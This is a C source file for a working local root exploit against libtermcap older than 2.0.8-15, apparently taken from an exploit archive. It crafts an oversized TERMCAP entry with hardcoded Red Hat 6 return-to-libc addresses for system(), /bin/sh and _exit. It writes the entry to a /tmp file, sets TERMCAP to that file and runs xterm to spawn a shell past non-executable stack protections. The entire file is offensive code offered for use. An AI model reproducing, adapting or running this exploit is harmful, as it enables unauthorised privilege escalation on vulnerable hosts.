exploits/7350termcap/libtermcapsploit.c


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

// yet another lame libtermcap<2.0.8-15 sploit by typo@scene.at (libc jumpback)
// only made this to bypass nonexecutable stack patches - http://teso.scene.at/

// Redhat 6 offsets (i only needed these)
int sys = 0x401bca40; // system
int sh = 0x4025ab12;  // /bin/sh
int exi = 0x4020b910; // _exit
int ran = 0x401b9928; // random offset in libc
int eip = 2136;
#define fil "/tmp/teso_termcap"
#define xte "/usr/X11R6/bin/xterm"
#define entry "xterm|"

int main(int argc, char **argv) {
    char *buf;
    int fd, buflen;

    argv++;

    if (argc>1) // dec,!hex args
   	sys = atoi(*(argv++));
    if (argc>2)
   	sh = atoi(*(argv++));
    if (argc>3)
   	exi = atoi(*(argv++));
    if (argc>4)
   	eip = atoi(*(argv++));

    buflen = eip + 20;

    buf = (char *) malloc(buflen);
    memset(buf, 'x', buflen);
    buf[buflen] = 0;

    memcpy(buf, entry, strlen(entry));
    memcpy (buf+buflen-4,":\\y",3);

    memcpy(buf+eip,&sys,4); 
    memcpy(buf+eip+4,&exi,4);
    memcpy(buf+eip+8,&sh,4);
    memcpy(buf+eip+12,&ran,4);

    if ( (fd = open(fil, O_WRONLY|O_CREAT|O_TRUNC, "644"))<0) {
	perror("cannot create file");
	exit(EXIT_FAILURE);
    }

    write(fd,buf,buflen);
    close(fd);
    free(buf);

    setenv("TERMCAP", fil, 1);
    execl(xte, "xterm", NULL);
    exit(EXIT_SUCCESS);
}